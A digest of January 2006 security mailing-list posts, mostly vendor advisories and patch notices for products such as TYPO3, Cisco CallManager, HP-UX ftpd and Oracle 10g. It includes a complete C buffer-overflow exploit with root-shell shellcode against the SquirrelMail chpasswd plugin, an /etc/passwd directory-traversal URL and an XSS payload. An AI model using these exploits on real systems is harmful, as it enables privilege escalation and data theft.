HITBSecConf2005 Videos Released
Hi all, After a long wait and a series of misadventures, we are pleased to announce the availability of the HITBSecConf2005 Kuala Lumpur videos. You can grab them here: http://video.hitb.org/2005.html The videos are distributed via Bit Torrent network and are broken down into two separate packages. HITBSecConf2006 will be taking place this year from September 16th - 19th at The Westin Kuala Lumpur. Stay tuned for the CfP which will be announced sometime next month. Cheers and enjoy the videos. --Prabu http://www.hackinthebox.org
IRM 015: File system path disclosure on TYPO3 Web Content Manager
-- IRM Security Advisory No. 015 File system path disclosure on TYPO3 Web Content Manager Vulnerablity Type / Importance: Information Leakage / Medium Problem discovered: January 13th 2006 Vendor contacted: January 13th 2006 Advisory published: January 19th 2006 -- Abstract: TYPO3 is a free Open Source content management system for enterprise purposes on the web and in intranets. It offers full flexibility and extendability while featuring an accomplished set of ready-made interfaces, functions and modules. Description: IRM has discovered an information leakage vulnerability in TYPO3 that allows remote users to disclose the file system path of the application when requesting certain files. The following files were found to disclose the application path: http://hostname/typo3/t3lib/thumbs.php http://hostname/tslib/showpic.php http://hostname/t3lib/stddb/tables.php Technical details: The issue is due to the application failing to properly determine its own physical path and therefore trying to 'require()' a wrong class file. From init.php, line 71: define('PATH_thisScript',str_replace('//','/', str_replace('\\','/', (php_sapi_name()=='cgi'||php_sapi_name()=='isapi' ||php_sapi_name()=='cgi-fcgi')($_SERVER['ORIG_PATH_TRANSLATED']?$_SERVER[' ORIG_PATH_TRANSLATED']:$_SERVER['PATH_TRANSLATED'])? ($_SERVER['ORIG_PATH_TRANSLATED']?$_SERVER['ORIG_PATH_TRANSLATED']:$_SERVER[ 'PATH_TRANSLATED']):($_SERVER['ORIG_SCRIPT_FILENAME']?$_SERVER['ORIG_SCRIPT_ FILENAME']:$_SERVER['SCRIPT_FILENAME']; From the PHP manual: You can define a constant by using the define()-function. Once a constant is defined, it can never be changed or undefined The vulnerable files listed above fail to include init.php and the 'PATH_thisScript' variable is locally calculated: define('PATH_thisScript',str_replace('//','/', str_replace('\\','/', (php_sapi_name()=='cgi'||php_sapi_name()=='isapi' ||php_sapi_name()=='cgi-fcgi')($_SERVER['ORIG_PATH_TRANSLATED']?$_SERVER[' ORIG_PATH_TRANSLATED']:$_SERVER['PATH_TRANSLATED'])? ($_SERVER['ORIG_PATH_TRANSLATED']?$_SERVER['ORIG_PATH_TRANSLATED']:$_SERVER[ 'PATH_TRANSLATED']):($_SERVER['ORIG_SCRIPT_FILENAME']?$_SERVER['ORIG_SCRIPT_ FILENAME']:$_SERVER['SCRIPT_FILENAME']; define('PATH_site', ereg_replace('[^/]*.[^/]*$','',PATH_thisScript)); define('PATH_t3lib', PATH_site.'t3lib/'); define('PATH_tslib', PATH_site.'tslib/'); At this point, constants 'PATH_t3lib' and 'PATH_tslib' contain wrong values and any 'require()' function using these constants will not work and will disclose the file system path. Tested Versions: Version 3.7.1 Vendor Patch Information: Contact was initially made via the TYPO3 bug reporting system on January 13th 2006. On January 14th a patch for the issue was published on the site (http://bugs.typo3.org/view.php?id=2248) Workarounds: IRM are not aware of any workarounds for this issue. Credits: Research Advisory: Rodrigo Marcos Disclaimer: All information in this advisory is provided on an 'as is' basis in the hope that it will be useful. Information Risk Management Plc is not responsible for any risks or occurrences caused by the application of this information. A copy of this advisory may be found at: http://www.irmplc.com/advisories.htm -- Information Risk Management Plc. Kings Building, Smith Square, London, United Kingdom SW1P 3JJ +44 (0)207 808 6420
Fortinet Advisory: BitComet URI Buffer Overflow Vulnerability
Fortinet Security Advisory: FSA-2006-07 BitComet URI Buffer Overflow Vulnerability Advisory Date : January 18, 2006 Reported Date : November 29, 2005 Vendor : BitComet Affected Products : BitComet v0.60 Severity : High Reference : http://www.bitcomet.com/doc/download.htm Description: Fortinet Security Research Team (FSRT) has discovered a URI buffer overflow Vulnerability in the BitComet P2P Client software. It indicates a possible exploit of buffer overflow vulnerability in BitComet. BitComet is one of the most popular P2P Client for file sharing, which uses bittorrent protocol. There is a bug in BitComet, a remote attacker could construct a special .torrent file and put it on any bt publish web site. When a user downloads the .torrent file and clicks on publishers name, BitComet will crash. An attacker can run arbitrary Command on victims host by specially crafted .torrent file. Impact : Execute arbitrary code Solution : BitComet has released a update for this vulnerability, which is available for downloading from BitComet's web site. Fortinet Protection: FortiGate series of security systems have been updated to detect exploits targeting this vulnerability. Acknowledgment : Dejun Meng of Fortinet Security Research team found this vulnerability. Disclaimer : Although Fortinet has attempted to provide accurate information in these materials, Fortinet assumes no legal responsibility for the accuracy or completeness of the information. More specific information is available on request from Fortinet. Please note that Fortinet's product information does not constitute or contain any guarantee, warranty or legally binding representation, unless expressly identified as such in a duly signed writing.
[eVuln] WebspotBlogging Authentication Bypass Vulnerability
New eVuln Advisory: WebspotBlogging Authentication Bypass Vulnerability http://evuln.com/vulns/41/summary.html Summary Software: WebspotBlogging Sowtware's Web Site: http://www.webspot.co.uk/ Versions: 3.0 Critical Level: Dangerous Type: SQL Injection Class: Remote Status: Unpatched Exploit: Available Solution: Not Available Discovered by: Aliaksandr Hartsuyeu (eVuln.com) eVuln ID: EV0041 -Description--- Vulnerable script: login.php Variable $_POST[username] isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code. Condition: gpc_magic_quotes - off Administrator has an ability to import themes using php code insertion from Admin Control Panel. System access is possible. --Exploit-- Available at: http://evuln.com/vulns/41/exploit.html --Solution- No Patch available. --Credit--- Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
Cisco Security Advisory: Cisco Call Manager Privilege Escalation
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Cisco Call Manager Privilege Escalation Advisory ID: cisco-sa-20060118-ccmpe http://www.cisco.com/warp/public/707/cisco-sa-20060118-ccmpe.shtml Revision 1.0 For Public Release 2006 January 18 1600 UTC (GMT) - --- Contents Summary Affected Products Details Impact Software Versions and Fixes Workarounds Obtaining Fixed Software Exploitation and Public Announcements Status of This Notice: FINAL Distribution Revision History Cisco Security Procedures - - Summary === Cisco CallManager (CCM) is the software-based call-processing component of the Cisco IP telephony solution which extends enterprise telephony features and functions to packet telephony network devices such as IP phones, media processing devices, voice-over-IP (VoIP) gateways, and multimedia applications. Cisco CallManager versions with Multi Level Administration (MLA) enabled may be vulnerable to privilege escalations, which may result in read-only users gaining administrative access. Cisco has made free software available to address this vulnerability for affected customers. There are workarounds available to mitigate the effects of the vulnerability. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20060118-ccmpe.shtml. Affected Products = Vulnerable Products +-- These Cisco CallManager versions with Multi Level Administration (MLA) enabled are vulnerable: * Cisco CallManager 3.2 and earlier * Cisco CallManager 3.3, versions earlier than 3.3(5)SR1 * Cisco CallManager 4.0, versions earlier than 4.0(2a)SR2c * Cisco CallManager 4.1, versions earlier than 4.1(3)SR2 No other Cisco products are currently known to be affected by these vulnerabilities. Complete this procedure to check if Multi Level Administration is enabled: 1. Access CCM Administration with this URL: http://CCMServer/ccmadmin, where CCMServer specifies the IP address or name of the Cisco CallManager server. 2. Choose User Access Rights Configure MLA Parameters. The MLA Enterprise Parameter Configuration page displays. 3. MLA is enabled if the Enable MultiLevelAdmin enterprise parameter is set to True. Details === An administrative user with read-only permission can use a crafted URL on the CCMAdmin web page to escalate privileges to a full administrative level. This vulnerability applies to users who are authenticated to the read-only administrative level. Users with no administrative access and users with full administrative permissions continue to work as expected. Administrative users with access privilege Read Only should not be confused with the standard User Group named Read Only which is created at installation. For further details on user groups and assigning access privileges, please refer to this URL: http://www.cisco.com/en/US/products/sw/voicesw/ps556/products_administration_guide_chapter09186a00803ed6ea.html#wp1022471. * CSCef75361, CSCsb12765, CSCsb88649, CSCsc26275?CCMAdmin Read Only User Can Escalate Privileges Impact == Successful exploitation of the vulnerability may result in privilege escalation where read-only administrative users can gain full administrative privileges and create, delete, or reset devices. Software Versions and Fixes === When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. Each row of the Cisco CallManager software table (below) describes a release train which will address all of the vulnerabilities mentioned in this advisory. If a given release train is vulnerable, then the earliest possible releases that contain the fixes (the First Fixed Release) and the anticipated date of availability for each are listed in the Engineering Special, Service Release, and Maintenance Release columns. A device running a Cisco CallManager release in the given train that is earlier than the release in a specific column (less than the First Fixed Release listed in the Engineering Special or Special Release column) is known to be vulnerable to one or more issues. The Cisco CallManager should be upgraded at least to the indicated release or a later version (greater than or equal to the First Fixed Release label).
Re: Re: MSN Messenger Password Decrypter for WinXP/2003
Hi, This is the author of the MSN Messenger Password Recovery tool. Searched in google and found this post. I would like to assure you that this program is not dangerous and does not perform any illegal actions. All it does is read the registry values and decrypt them. What's wrong with using UPX? As far as the link at the bottom is concerned - we are in the process of making the Skype tool and will put a proper website in place once we are finished. Also, regarding you message that this program is malicious: http://www.softpedia.com/progClean/MSN-Messenger-Password-Recovery-Clean-32261.html MSN Messenger Password Recovery 1.1.100.2006 - SOFTPEDIA 100% CLEAN AWARD This software product was tested in the Softpedia labs on: 18 January 2006
CAID 33756 - DM Deployment Common Component Vulnerabilities
Title: CAID 33756 - DM Deployment Common Component Vulnerabilities CA Vulnerability ID: 33756 Discovery Date: 2005-12-20 CA Advisory Date: 2006-01-17 Discovered By: Cengiz Aykanat (CA internal audit), and Karma[at]DesignFolks[dot]com[dot]au. Impact: Remote attacker can cause a denial of service condition. Summary: The following security vulnerability issues have been identified in the DM Primer part of the DM Deployment Common Component being distributed with some CA products: 1) A Denial of Service (DoS) vulnerability has been identified in the handling of unrecognized network messages, which may result in high CPU utilization and excessive growth of the DM Primer log file. 2) A Denial of Service (DoS) vulnerability has been identified with the way in which DM Primer handles receipt of large rogue network messages, which can result in DM Primer becoming unresponsive. Severity: Computer Associates has given this vulnerability a Medium risk rating. Mitigating Factors: These vulnerabilities will only be present if you have utilized the DM Deployment mechanism (bundled with the affected products) to deploy those products within your enterprise environment. Affected Technologies: Please note that the DM Primer component is not a product, but rather a common component that is included with multiple products. Vulnerable versions of the DM Primer component are included in the CA products listed in the Affected Products section below. DM Primer component versions v1.4.154 and v1.4.155 are vulnerable to these issues. These vulnerabilities are not present in DM Primer v11.0 or later. Affected Products: - BrightStor Mobile Backup r4.0 - BrightStor ARCserve Backup for Laptops Desktops r11.0, r11.1, r11.1 SP1 - Unicenter Remote Control 6.0, 6.0 SP1 - CA Desktop Protection Suite r2 - CA Server Protection Suite r2 - CA Business Protection Suite r2 - CA Business Protection Suite for Microsoft Small Business Server Standard Edition r2 - CA Business Protection Suite for Microsoft Small Business Server Premium Edition r2 - CA Business Protection Suite for Midsize Business for Windows r2 Affected platforms: Windows Platforms NOT affected: This version of DM Primer is not supported on any other platforms. Status and Recommendation: Since this version of DM Primer is only utilized for the initial installation of the products, the above vulnerabilities can be addressed by simply removing the DM Primer Service after deployment. To remove the DM Primer component follow the instructions below: dmprimer remove -f: will force the removal of a local DM Primer service, dmsweep -a1:remotecomp -dp:force will force the removal of the DM Primer service from a remote computer called remotecomp. The dmsweep command will be available on the DM Deployment machine (usually the host for the product manager with which it was bundled). It can take a machine name, an ip address, or a range of ip addresses. Some examples are: dmsweep -a1:192.168.0.* -dp:force will forcibly remove DM Primer from all machines on the 192.168.0.* subnet dmsweep -a1:192.168.0.1 -a2:192.168.0.100 -dp:force will forcibly remove DM Primer from all machines in the range 192.168.0.1-192.168.0.100 dmsweep -a1:192.168.0.1 -a2:192.168.0.100 -dp:force will forcibly remove DM Primer from all machines in the range 192.168.0.1-192.168.0.100 Please refer to the FAQ for answers to commonly asked questions. http://supportconnectw.ca.com/public/ca_common_docs/dmdeploysecurity-faq s.asp References: (note that URLs may wrap) DM Deployment Common Component Security Notice http://supportconnectw.ca.com/public/ca_common_docs/dmdeploysecurity_not ice.asp Frequently Asked Questions (FAQ) related to this security update http://supportconnectw.ca.com/public/ca_common_docs/dmdeploysecurity-faq s.asp CA Security Advisor site advisory http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33756 CVE Reference: Pending http://cve.mitre.org OSVDB Reference: Pending http://osvdb.org Error Handling in DM Primer http://www.designfolks.com.au/karma/DMPrimer/ Customers who require additional information should contact CA Technical Support at http://supportconnect.ca.com. For technical questions or comments related to this advisory, please send email to [EMAIL PROTECTED], or contact me directly. If you discover a vulnerability in CA products, please report your findings to [EMAIL PROTECTED], or utilize our Submit a Vulnerability form. URL: http://www3.ca.com/securityadvisor/vulninfo/submit.aspx Regards, Ken Williams ; 0xE2941985 Dir. Vuln Research CA Vulnerability Research Team CA, One Computer Associates Plaza. Islandia, NY 11749 Contact http://www3.ca.com/contact/ Legal Notice http://ca.com/calegal.htm Privacy Policy http://www.ca.com/caprivacy.htm Copyright 2006 CA. All rights reserved.
Google's Blogger.com classic HTTP response splitting vulnerability
Blogger.com classic HTTP response splitting vulnerability ~ 0. Original Advisory ~~~ http://o0o.nu/~meder/o0o_Blogger_HTTP_response_splitting.txt I. Background ~ Blogger.com is Google's blogging service. II. Description ~~~ Blogger's personal page redirection mechanism contains a classic HTTP response splitting vulnerability in the Location HTTP header. The problem occurs due to use of unsanitized user-supplied data in the Location HTTP header, which enables attacker to inject CRLF(%0d%0a) characters thus splitting server's response taking full control over the contents of second HTTP response. Exploitation of the vulnerability can lead to cross-site scripting (XSS), cache poisioning and phishing attacks. The following URL was taking contents of query string and using it in Location HTTP header without proper sanitation: http://www.blogger.com/r?[URL here] III. Vendor status ~~ Vulnerability has been fixed on 13/01/2006 IV. Disclosure timeline ~~~ 02/01/2006 - Issue discovered. Vendor notified. 02/01/2006 - Initial vendor response. 12/01/2006 - Vendor inquired on status. 13/01/2006 - Vendor response and confirmation that bug fixed. V. References ~ 1. http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf -- http://o0o.nu/~meder
Re: IRM 015: File system path disclosure on TYPO3 Web Content Manager
On Thu, Jan 19, 2006 at 10:30:36AM -, Advisories wrote: File system path disclosure on TYPO3 Web Content Manager Vulnerablity Type / Importance: Information Leakage / Medium Hm, since when path disclosure is medium importance? The following files were found to disclose the application path: http://hostname/typo3/t3lib/thumbs.php http://hostname/tslib/showpic.php http://hostname/t3lib/stddb/tables.php Tested Versions: Version 3.7.1 The first one verified as applicable to 3.8.1 too (easily avoidable by adding IP- or user-based access restriction to /typo3 since that's administrative backend anyways), and the rest doesn't disclose anything on properly configured at least display_errors-wise webserver, which is a documented recommended (and often reiterated everywhere) PHP setup. Workarounds: IRM are not aware of any workarounds for this issue. Ouch. :) -- WBR, Michael Shigorin [EMAIL PROTECTED] -- Linux.Kiev http://www.linux.kiev.ua/ pgpq8HogPHEMU.pgp Description: PGP signature
[security bulletin] SSRT5971 rev.1 - HP-UX Running ftpd Remote Denial of Service (DoS)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c00592668 Version: 1 HPSBUX02092 SSRT5971 rev.1 - HP-UX Running ftpd Remote Denial of Service (DoS) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2006-01-17 Last Updated: 2006-01-18 Potential Security Impact: Remote Denial of Service (DoS) Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP-UX running ftpd. The vulnerability could be exploited by a remote unauthorized user to cause ftpd to become unresponsive, leading to a Denial fo Service (DoS). References: None SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.00, B.11.04, B.11.11, B.11.23 running ftpd BACKGROUND To determine if an HP-UX system has an affected version, search the output of swlist -a revision -l fileset for one of the filesets listed below. For affected systems verify that the recommended action has been taken. AFFECTED VERSIONS HP-UX B.11.23 = InternetSrvcs.INETSVCS2-RUN action: install PHNE_33414 or subsequent HP-UX B.11.11 = InternetSrvcs.INETSVCS2-RUN action: install PHNE_33412 or subsequent HP-UX B.11.11 = WUFTP-26.INETSVCS-FTP action: install revision B.11.11.01.006 or subsequent. HP-UX B.11.04 = InternetSrvcs.INETSVCS-RUN action: install PHNE_34077 or subsequent HP-UX B.11.00 = InternetSrvcs.INETSVCS-RUN action: install PHNE_33406 or subsequent HP-UX B.11.00 = WUFTP-26.INETSVCS-FTP action: install revision B.11.00.01.005 or subsequent. END AFFECTED VERSIONS RESOLUTION HP has made the following patches available to resolve the issue for the InternetSrvcs product. The patches can be downloaded from http://itrc.hp.com B.11.23 - PHNE_33414 or subsequent B.11.11 - PHNE_33412 or subsequent B.11.04 - PHNE_34077 or subsequent B.11.00 - PHNE_33406 or subsequent HP has made the following software updates available to resolve the issue for the WUFTP-26 product. The software updates can be downloaded from http://www.hp.com/go/softwaredepot B.11.11 - revision B.11.11.01.006 or subsequent. B.11.00 - revision B.11.00.01.005 or subsequent. MANUAL ACTIONS: Yes - Update B.11.23, B.11.04 - No manual actions. B.11.11, B.11.00 - InternetSrvcs - No manual actions. B.11.11, B.11.00 - WUFTP-26 - Install software updates. PRODUCT SPECIFIC INFORMATION HP-UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all HP-issued Security Bulletins to provide a subset of recommended actions that potentially affect a specific HP-UX system. For more information: http://software.hp.com/portal/swdepot/displayProductInfo.do? productNumber=B6834AA HISTORY Version:1 (rev.1) - 18 January 2006 Initial release Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED] It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: [EMAIL PROTECTED] Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA; langcode=USENGjumpid=in_SC-GEN__driverITRCtopiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW, MA = HP Management Agents, MI = Misc. 3rd party SW, MP = HP MPE/iX, NS = HP NonStop Servers, OV = HP OpenVMS, PI = HP Printing Imaging, ST = HP Storage SW, TL = HP Trusted Linux, TU = HP Tru64 UNIX, UX = HP-UX, VV = HP Virtual Vault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. HP is broadly distributing this Security Bulletin
Phpclanwebsite BBCode IMG Tag XSS Vulnerability
##Night_WarriorKurdish Hacker ##night_warrior771[at]hotmail.com ##Phpclanwebsite BBCode IMG Tag XSS Vulnerability ##Contact :night_warrior771[at]hotmail.com ##hompage : www.phpclanwebsite.com Vulnerable: [img]javascript:alert('XSS')[/img] Contact :night_warrior771[at]hotmail.com Night_Warrior
Re: Directory traversal in phpXplorer
Hey, I just wanted to point out a couple of things I neglected to mention in my first reply to this advisory: 1) Even if something isn't a critical problem, a vendor should still respond to the issue, if for no other reason than to straighten out the situation with the user who had enough insight to spot it and assume its a problem. 2) Only reporting a bug between Dec 20 - Jan 4 is in bad practice, I think. The advisory noted those two dates as when the vendor was sent an advisory. As most people know this period of time is considered Christmas and New Years vacation in the USA and other places. Beyond that the phpXplorer project is an open source project and may not have dedicated support. In short a little more leeway should be profited during the holidays and vendors should always respond to issue like this so no one gets hung out to dry like this. Best Regards, Stan Bubrouski On 1/16/06, Stan Bubrouski [EMAIL PROTECTED] wrote: Seeing as phpXplorer allows the upload and editing of live PHP files anyways it seems to me this exploit is completely useless. You can use the script as intended to cat the password file if you want. Right? -sb On 1/16/06, Oriol Torrent [EMAIL PROTECTED] wrote: == Title: Directory traversal in phpXplorer Application: phpXplorer Vendor: http://www.phpxplorer.org Vulnerable Versions: 0.9.33 Bug: directory traversal Date: 16-January-2006 Author: Oriol Torrent Santiago oriol.torrent.AT.gmail.com References: http://www.arrelnet.com/advisories/adv20060116.html == 1) Background --- phpXplorer is an open source file management system written in PHP. It enables you to work on a remote file system through a web browser. 2) Problem description An attacker can read arbitrary files outside the web root by sending specially formed requests Ex: http://host/phpXplorer/system/workspaces.php?sShare=../../../../../../../../etc/passwd%00ref=1 3) Solution: -- No Patch available. 4) Timeline - 17/12/2005 Bug discovered 20/12/2005 Vendor receives detailed advisory. No response 04/01/2006 Second notification. No response 16/01/2006 Public Disclosure
Critical security advisory #006 tftpd32 Format string
Critical security advisory #006 Tftpd32 2.81 Format String + DoS PoC Critical Security - 22:03 2006.01.19 Critical Security research: http://www.critical.lt Product site: http://tftpd32.jounin.net/ Credits : Critical Security Team (www.critical.lt) Original Advisory: http://www.critical.lt/?vulnerabilities/200 Due to incorrect use of format strings there is a possibility of remote code execution. You can trigger this vulnerability by sending SEND or GET request with a specially formated string. Vulnerable code: LEA ECX,DWORD PTR SS:[ESP+430] LEA EAX,DWORD PTR SS:[ESP+1C] PUSH ECX ; /Arglist PUSH EDX ; |Format PUSH EAX ; |s = 00E6F4E8 CALL DWORD PTR DS:[USER32.wvsprintfA] ; \wvsprintfA Proof of concept exploit: http://www.critical.lt/research/tftpd32_281_dos.txt
MDKSA-2006:017 - Updated mod_auth_ldap packages fix vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:017 http://www.mandriva.com/security/ ___ Package : mod_auth_ldap Date: January 19, 2006 Affected: Corporate 2.1 ___ Problem Description: A format string flaw was discovered in the way that auth_ldap logs information which may allow a remote attacker to execute arbitrary code as the apache user if auth_ldap is used for authentication. This update provides version 1.6.1 of auth_ldap which corrects the problem. Only Corporate Server 2.1 shipped with a supported auth_ldap package. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0150 ___ Updated Packages: Corporate Server 2.1: a579c887e48daaa8281ecdc4e1381fa0 corporate/2.1/RPMS/mod_auth_ldap-1.6.1-1.2.C21mdk.i586.rpm 3af337e3989aed18d9c6e634ecb3e47b corporate/2.1/SRPMS/auth_ldap-1.6.1-1.2.C21mdk.src.rpm Corporate Server 2.1/X86_64: b3c27d91b6fa68e557507318c8e18f0c x86_64/corporate/2.1/RPMS/mod_auth_ldap-1.6.1-1.2.C21mdk.x86_64.rpm 3af337e3989aed18d9c6e634ecb3e47b x86_64/corporate/2.1/SRPMS/auth_ldap-1.6.1-1.2.C21mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFDz9lvmqjQ0CJFipgRAhbvAKDejWx5RUTciABT7qVXho9XOyOH5ACgsi58 FLI7qZytVoR7yezzkdYV47M= =GvY0 -END PGP SIGNATURE-
FreeBSD Security Advisory FreeBSD-SA-06:05.80211
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 = FreeBSD-SA-06:05.80211 Security Advisory The FreeBSD Project Topic: IEEE 802.11 buffer overflow Category: core Module: net80211 Announced: 2006-01-18 Credits:Karl Janmar Affects:FreeBSD 6.0 Corrected: 2006-01-18 09:03:15 UTC (RELENG_6, 6.0-STABLE) 2006-01-18 09:03:36 UTC (RELENG_6_0, 6.0-RELEASE-p3) CVE Name: CVE-2006-0226 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit URL:http://www.freebsd.org/security/. I. Background The IEEE 802.11 network subsystem of FreeBSD implements the protocol negotiation used for wireless networking. II. Problem Description An integer overflow in the handling of corrupt IEEE 802.11 beacon or probe response frames when scanning for existing wireless networks can result in the frame overflowing a buffer. III. Impact An attacker able broadcast a carefully crafted beacon or probe response frame may be able to execute arbitrary code within the context of the FreeBSD kernel on any system scanning for wireless networks. IV. Workaround No workaround is available, but systems without IEEE 802.11 hardware or drivers loaded are not vulnerable. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to 6-STABLE or to the RELENG_6_0 security branch dated after the correction date. 2) To patch your present system: The following patches have been verified to apply to FreeBSD 6.0 systems. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:05/80211.patch # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:05/80211.patch.asc b) Apply the patch. # cd /usr/src # patch /path/to/patch c) Recompile your kernel as described in URL:http://www.freebsd.org/handbook/kernelconfig.html and reboot the system. VI. Correction details The following list contains the revision numbers of each file that was corrected in FreeBSD. Branch Revision Path - - RELENG_6 src/sys/net80211/ieee80211_ioctl.c 1.25.2.9 RELENG_6_0 src/UPDATING 1.416.2.3.2.8 src/sys/conf/newvers.sh1.69.2.8.2.4 src/sys/net80211/ieee80211_ioctl.c 1.25.2.3.2.1 - - VII. References http://www.signedness.org/advisories/sps-0x1.txt http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0226 The latest revision of this advisory is available at ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-06:05.80211.asc -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (FreeBSD) iD8DBQFDzgUEFdaIBMps37IRAnB4AJ9btdO5oRpjDyksIQKhimmnAvaqSgCfdqZJ q5gy4Ec/4lhZjoaGCbUuncU= =XgsT -END PGP SIGNATURE-
Change passwd 3.1 (SquirrelMail plugin )
Change passwd 3.1 (SquirrelMail plugin ) Coded by rod hedor web-- http://lezr.com [local exploit] * Multiple buffer overflows are present in the handling of command line arguements in chpasswd. The bug allows a hacker to exploit the process to run arbitrary code. #include stdio.h #include stdlib.h const char shellcode[]=\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90 \x31\xc0\xb0\x17\x31\xdb\xcd\x80 \x89\xe5\x31\xc0\x50\x55\x89\xe5 \x50\x68\x6e\x2f\x73\x68\x68\x2f \x2f\x62\x69\x89\xe3\x89\xe9\x89 \xea\xb0\x0b\xcd\x80; long get_sp(){ __asm__(movl %esp,%eax;); }; int main(){ char buffer[1024]; long stack = get_sp(); int result = 1; long offset = 0; printf ([!] Change_passwd v3.1(SquirrelMail plugin) exploit\n); printf ([+] Current stack [0x%x]\n,stack); while(offset = 268435456){ offset = offset + 1; stack = get_sp() + offset; memcpy(buffer,EGG=,4); int a = 4; while(a = 108){ memcpy(buffer[a],x,1); a = a + 1;} memcpy(buffer[108],stack,4); memcpy(buffer[112],shellcode,sizeof(shellcode)); putenv(buffer); result = system(./chpasswd $EGG); if(result == 0){exit(0);}; }; }; _ FREE pop-up blocking with the new MSN Toolbar - get it now! http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/
Oracle Database 10g Rel. 1 - SQL Injection in SYS.KUPV$FT
# http://www.red-database-security.com/advisory/oracle_sql_injection_kupv$ft.html ### SQL Injection in package SYS.KUPV$FT Name SQL Injection in package SYS.KUPV$FT AffectedOracle 10g Release 1 SeverityHigh Risk CategorySQL Injection Vendor URL http://www.oracle.com/ Author Alexander Kornbrust (ak at red-database-security.com) Advisory17 Jan 2006 (V 1.00) Details: The package SYS.KUPV$FT contains 3 SQL injection vulnerabilities in the functions ATTACH_JOB, OPEN_JOB, HAS_PRIVS. Oracle fixed these vulnerabilities with the package dbms_assert. Patch Information: ## Apply the patches for Oracle CPU Jan 2006 on top of Oracle 10g Release 1. History: 01-nov-2005 Oracle secalert was informed 02-nov-2005 Oracle secalert asked for an exploit 17-jan-2006 Oracle published CPU January 2006 17-jan-2006 Advisory published © 2006 by Red-Database-Security GmbH http://www.red-database-security.com/advisory/published_alerts.html
Oracle Database 10g Rel. 1 - SQL Injection in SYS.KUPV$FT_INT
# http://www.red-database-security.com/advisory/oracle_sql_injection_kupv$ft_int.html ### Name SQL Injection in package SYS.KUPV$FT_INT Affected Oracle 10g Release 1 Severity High Risk Category SQL Injection Vendor URL http://www.oracle.com/ Author Alexander Kornbrust (ak at red-database-security.com) Advisory 17 Jan 2006 (V 1.00) Details: The package SYS.KUPV$FT_INT contains 16 SQL injection vulnerabilities in the functions ATTACH_JOB, OPEN_JOB, HAS_PRIVS. Oracle is now using bind variables to fix these vulnerabilities. Patch Information: ## Apply the patches for Oracle CPU Jan 2006 on top of Oracle 10g Release 1. History: 01-nov-2005 Oracle secalert was informed about vulnerabilities in ACTIVE_JOB, ATTACH_JOB, ATTACH_POSSIBLE, CREATE_NEW_JOB, DELETE_JOB, UPDATE_JOB 02-nov-2005 Oracle secalert asked for an exploit 17-jan-2006 Oracle published CPU January 2006 17-jan-2006 Advisory published © 2006 by Red-Database-Security GmbH http://www.red-database-security.com/advisory/published_alerts.html